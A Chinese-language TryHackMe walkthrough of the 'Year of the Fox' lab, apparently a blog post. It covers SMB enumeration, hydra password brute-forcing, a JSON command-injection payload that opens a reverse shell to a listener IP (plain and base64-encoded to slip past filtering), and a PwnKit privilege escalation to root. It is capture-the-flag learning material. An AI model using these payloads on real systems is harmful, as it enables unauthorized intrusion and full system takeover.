THM打靶日寄21-Year of the Fox

扫描打点
- 80
  
  提示要登录
  
  没信息啊，先转到 smb 看看有没有共享什么的
- smb
  1
  enum4linux -a 10.10.156.98
  这里用本地连 vpn 跑不出来，换成 attackbox 才行，令人感慨
  
  有一个无法访问到的共享：
  
  和两个账户：
  
  没东西了，考虑拿这两个用户名去爆破登录框
- web
  1
  2
  hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.156.98 http-get
  hydra -l fox -P /usr/share/wordlists/rockyou.txt 10.10.156.98 http-get
  拿到账密：rascal:june14
json 注入拿 rce

登陆进去是个搜索框，抓包看到是给 search.php 上传了一个 json 数据格式

这里用到的是没学过的 json 注入，但注入的思想类似，这里使用 " \ 来分隔数据并达到命令执行的效果

这个大致思路是这样的：
- \" 转义双引号，用于闭合命令执行里面这个参数前面的双引号
- ; 结束当前命令
- \n 写入当前命令后换行，保证写入的命令的执行
  
  可以写反弹 shell 了：
  1
  {"target":"\"; /bin/bash -i >& /dev/tcp/10.10.223.151/443 0>&1 \n"}
  然后被逮捕了，应该是符号的问题，懒得测了直接转 base64
  1
  {"target":"\"; echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjIyMy4xNTEvNDQzIDA+JjE= |base64 -d |bash\n"}
~~横向移动~~ 懒狗一把梭

看了下 /home 有两个跟上面一样的用户，但不能用 su 来转到 rascal

懒狗了，传个 linpeas 一把梭看看

~~我草我发现个巨懒狗的非预期解，网上目前没人发~~ tmd一年后的通杀确实能梭

这里扫出来这个，直接跟 jellyfish 一样传个 PwnKit 就一步 root 了

这里版本号是 18 ，低版本确实直接梭